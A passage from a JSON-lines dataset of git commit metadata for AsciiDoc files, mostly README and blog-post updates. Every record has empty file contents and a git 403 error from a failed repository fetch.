chny\/elasticsearch,lightslife\/elasticsearch,heng4fun\/elasticsearch,dongjoon-hyun\/elasticsearch,girirajsharma\/elasticsearch,JackyMai\/elasticsearch,wbowling\/elasticsearch,jchampion\/elasticsearch,vroyer\/elassandra,vingupta3\/elasticsearch,s1monw\/elasticsearch,ivansun1010\/elasticsearch,yongminxia\/elasticsearch,adrianbk\/elasticsearch,Shepard1212\/elasticsearch,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,sauravmondallive\/elasticsearch,snikch\/elasticsearch,a2lin\/elasticsearch,karthikjaps\/elasticsearch,SergVro\/elasticsearch,weipinghe\/elasticsearch,mortonsykes\/elasticsearch,peschlowp\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,yongminxia\/elasticsearch,andrejserafim\/elasticsearch,wittyameta\/elasticsearch,sscarduzio\/elasticsearch,vorce\/es-metrics,markllama\/elasticsearch,dongjoon-hyun\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,phani546\/elasticsearch,ouyangkongtong\/elasticsearch,tcucchietti\/elasticsearch,kalburgimanjunath\/elasticsearch,xpandan\/elasticsearch,Chhunlong\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,likaiwalkman\/elasticsearch,zhaocloud\/elasticsearch,Fsero\/elasticsearch,Siddartha07\/elasticsearch,mnylen\/elasticsearch,Stacey-Gammon\/elasticsearch,palecur\/elasticsearch,shreejay\/elasticsearch,ESamir\/elasticsearch,zeroctu\/elasticsearch,milodky\/elasticsearch,ajhalani\/elasticsearch,sjohnr\/elasticsearch,cnfire\/elasticsearch-1,acchen97\/elasticsearch,yuy168\/elasticsearch,Ansh90\/elasticsearch,avikurapati\/elasticsearch,nrkkalyan\/elasticsearch,iantruslove\/elasticsearch,hirdesh2008\/elasticsearch,Brijeshrpatel9\/elasticsearch,wenpos\/elasticsearch,TonyChai24\/ESSource,Clairebi\/ElasticsearchClone,Asimov4\/elasticsearch,MichaelLiZhou\/elasticsearch,mute\/elasticsearch,wbowling\/elasticsearch,elasticdog\/elasticsearch,jango2015\/elasticsearch,dataduke\/elasticsearch,andrestc\/elasticsearch,javachengwc\/elasticsearch,ouyangkongtong\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,lchennup\/elasticsearch,HonzaKral\/elasticsearch,dpursehouse\/elasticsearch,fred84\/elasticsearch,tkssharma\/elasticsearch,chirilo\/elasticsearch,boliza\/elasticsearch,amaliujia\/elasticsearch,golubev\/elasticsearch,sdauletau\/elasticsearch,golubev\/elasticsearch,yanjunh\/elasticsearch,Charlesdong\/elasticsearch,kimimj\/elasticsearch,mikemccand\/elasticsearch,sdauletau\/elasticsearch,koxa29\/elasticsearch,mohit\/elasticsearch,smflorentino\/elasticsearch,Microsoft\/elasticsearch,acchen97\/elasticsearch,yongminxia\/elasticsearch,jeteve\/elasticsearch,YosuaMichael\/elasticsearch,mnylen\/elasticsearch,smflorentino\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra,himanshuag\/elasticsearch,Brijeshrpatel9\/elasticsearch,petabytedata\/elasticsearch,LeoYao\/elasticsearch,EasonYi\/elasticsearch,yanjunh\/elasticsearch,sscarduzio\/elasticsearch,sc0ttkclark\/elasticsearch,khiraiwa\/elasticsearch,EasonYi\/elasticsearch,mkis-\/elasticsearch,sposam\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,pritishppai\/elasticsearch","old_file":"rest-api-spec\/test\/README.asciidoc","new_file":"rest-api-spec\/test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d78b525cd5d3aa32b4c9fada5ea06e48cec610d7","subject":"Create README.adoc","message":"Create README.adoc\n","repos":"tgirard12\/kotlin-talk","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tgirard12\/kotlin-talk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a44cd7644f4cbdde98a34cc75a05521d6e7fb6b3","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-request-content-limit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-request-content-limit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ceb9a45d8bbd59bdd05cbae1695a4f6f661223ec","subject":"Updated README","message":"Updated README\n","repos":"adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24c5fad0374ee2f5233f0b431219e942dc3e5dfd","subject":"Better English convention","message":"Better English convention\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e4de0d2c87a3ff3c60c1d23263ad0310a3fd303e","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a53db22a226ccac73cc9db24332ff990cc5cf2","subject":"Create InstallingHadoop.asciidoc","message":"Create InstallingHadoop.asciidoc","repos":"agilemobiledev\/Intro-to-Spring-Hadoop,SpringOne2GX-2014\/Intro-to-Spring-Hadoop,SpringOne2GX-2014\/Intro-to-Spring-Hadoop,agilemobiledev\/Intro-to-Spring-Hadoop","old_file":"InstallingHadoop.asciidoc","new_file":"InstallingHadoop.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/agilemobiledev\/Intro-to-Spring-Hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fba5615618f44d956430612ac61c0aa0da1c4eeb","subject":"Update 2018-02-02-Patching-OP-Version.adoc","message":"Update 2018-02-02-Patching-OP-Version.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-02-02-Patching-OP-Version.adoc","new_file":"_posts\/2018-02-02-Patching-OP-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2945177bed84022b9e9cce7da6e7dce8215224a0","subject":"Some notes about Jaas like security.","message":"Some notes about Jaas like security.\n\nDidn't result in much outcome","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"doc\/notes\/jaas_like_security.adoc","new_file":"doc\/notes\/jaas_like_security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72e0e41d5532240bac583ad5e1ad8ece30aca06a","subject":"Update 2016-07-01-A-Flower.adoc","message":"Update 2016-07-01-A-Flower.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-01-A-Flower.adoc","new_file":"_posts\/2016-07-01-A-Flower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9859b8f8f3eca6a642180cba09eaf14637f3e87f","subject":"Update 2016-11-03-Kamakura.adoc","message":"Update 2016-11-03-Kamakura.adoc","repos":"endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io","old_file":"_posts\/2016-11-03-Kamakura.adoc","new_file":"_posts\/2016-11-03-Kamakura.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b3549170d74489b06b0c27e06da547a06bb9a7f","subject":"Update 2017-05-02-FGOCCCBB.adoc","message":"Update 2017-05-02-FGOCCCBB.adoc","repos":"shunkou\/blog,shunkou\/blog,shunkou\/blog,shunkou\/blog","old_file":"_posts\/2017-05-02-FGOCCCBB.adoc","new_file":"_posts\/2017-05-02-FGOCCCBB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shunkou\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3dce21aa7fa9d4c4fd013e9322476a4810397f","subject":"Update 2020-02-12-strength.adoc","message":"Update 2020-02-12-strength.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-02-12-strength.adoc","new_file":"_posts\/2020-02-12-strength.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d570591ef160a7eca7f1fe879d1aab443426f3","subject":"Update 2016-05-17-Kuznya-a-ved-udobno.adoc","message":"Update 2016-05-17-Kuznya-a-ved-udobno.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno.adoc","new_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09227eb5c2573d86b14c7bd935583d2a9502e5e2","subject":"Update 2015-02-10-R-K.adoc","message":"Update 2015-02-10-R-K.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-R-K.adoc","new_file":"_posts\/2015-02-10-R-K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85300fc95402b9ec1577d962347e4bac2a4cf68d","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa90396e82efaadf1fcfcf63d3cd4a9679af98cd","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07f416293d6e0b8f4c5e75c9c8091553493efc86","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88e901fee7766a895ab77108b6f073fae6bf4a8c","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cdcc148dca840f34b479a1b0f77464cd440b123","subject":"Adding some notes on UI Security","message":"Adding some notes on UI Security\n","repos":"lefou\/blended,woq-blended\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/UISecurity.adoc","new_file":"doc\/UISecurity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a9d640ea5aea98704a8035647bebea34555f27","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d620a2ab9b8c8387052fd62701869e39d92ea32","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e009035cb6d81880386ed595433760e3a2edd24","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e244a9e7d65a880b3d7ce9f925fa1eb88df7d688","subject":"Lib: Rope","message":"Lib: Rope\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0d3dec2b1c113cfab425dacce38530c38baee872","subject":"y2b create post This Might Be The Coolest iPhone Case Ever...","message":"y2b create post This Might Be The Coolest iPhone Case Ever...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-12-This-Might-Be-The-Coolest-iPhone-Case-Ever.adoc","new_file":"_posts\/2017-07-12-This-Might-Be-The-Coolest-iPhone-Case-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97392be75242d7d28ea61e1961a0e5e7fcad5cb","subject":"Create etalab\/index.adoc","message":"Create etalab\/index.adoc","repos":"dtc-innovation\/research,dtc-innovation\/research","old_file":"etalab\/index.adoc","new_file":"etalab\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dtc-innovation\/research.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6660ab3c2e83445940d90131dc649ae95969312","subject":"Update 2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-08-23-Implementacion-de-una-pantalla-en-JSF-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6b951dc6bfa78840ba3771ba0b2b17b61f3e13","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7124d7f368bc19950a3e68cc3f74315fd6fa42a4","subject":"Update 2018-06-24-Laravel56.adoc","message":"Update 2018-06-24-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56.adoc","new_file":"_posts\/2018-06-24-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f79e47a91307fad666efd6974083dbc4c72a16f2","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de2856c4b4acaa97671b156460f033cfde442ec","subject":"Create README.adoc","message":"Create README.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"images\/post3\/README.adoc","new_file":"images\/post3\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89fd37750182ff9e587a2fc95f1e1d000ad2f03b","subject":"Update 2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","message":"Update 2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","new_file":"_posts\/2015-03-11-jQuery-datepicker-Mit-pickadatejs-eine-responsive-Datumsauswahl-ermoglichen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a72fc549974ee40443c6c1934f0a78eb15e6f6a","subject":"Update 2013-06-17-The-PHP-maybe-function.adoc","message":"Update 2013-06-17-The-PHP-maybe-function.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-17-The-PHP-maybe-function.adoc","new_file":"_posts\/2013-06-17-The-PHP-maybe-function.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fac839854b001f55cd98dbaa712a2a7bdff4faf","subject":"y2b create post iPhone 6S vs Ford F150","message":"y2b create post iPhone 6S vs Ford F150","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-02-iPhone-6S-vs-Ford-F150.adoc","new_file":"_posts\/2015-10-02-iPhone-6S-vs-Ford-F150.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319424b81c6677952c7c75160559fa5d47d6e14","subject":"Adding wip platform doc","message":"Adding wip platform doc\n","repos":"khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev","old_file":"docs\/design\/draft\/platform\/platform-flows.adoc","new_file":"docs\/design\/draft\/platform\/platform-flows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f2fbd4544232132a2b982a4bea1e7b5bf4f2953","subject":"Minor further info","message":"Minor further info\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bce8a360c6ca6ef958fd3d353a739e17f54e613","subject":"Update 2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","message":"Update 2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","new_file":"_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7743cdc7e79bf9ae92a102d788579c4233496d63","subject":"Readme file created","message":"Readme file created","repos":"EcoNum\/EN-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EcoNum\/EN-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4940e139e3af8f7d7e9e8052de1a2ead2457fbb","subject":"Use man page as a README","message":"Use man page as a README\n","repos":"kamalmarhubi\/lsaddr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kamalmarhubi\/lsaddr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c8ac2b13fbe4d645897115bcf0c7cc982a0f18","subject":"Create README.adoc","message":"Create README.adoc","repos":"bedrin\/kerb4j,bedrin\/kerb4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bedrin\/kerb4j.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"36a3f2abcb18d99c3ff0cca03e2833d23a6671a2","subject":"Create README.adoc","message":"Create README.adoc","repos":"reckart\/tt4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reckart\/tt4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"590b8377a2c2ae93e48d6a642d30202f1e68a513","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"414b761f4ab85b050b397128224d27680b94a67f","subject":"Update README.adoc","message":"Update README.adoc\n\nFix document section order","repos":"gregory90\/react-popover,clara-labs\/react-popover,littlebits\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8930dc7580c5591fa32ff18a04993f571bb7c5b0","subject":"Update README","message":"Update README\n","repos":"pjanouch\/razer-bw-te-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/razer-bw-te-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"e9f30e8fe966e59f6e6875bc1cca63fccfd8ea0f","subject":"Create new README","message":"Create new README\n","repos":"mshogren\/bbqpi-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mshogren\/bbqpi-server.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af44153784612a54f55c49630aac191bbe314ef","subject":"Add a README.","message":"Add a README.\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/extruder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/extruder.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 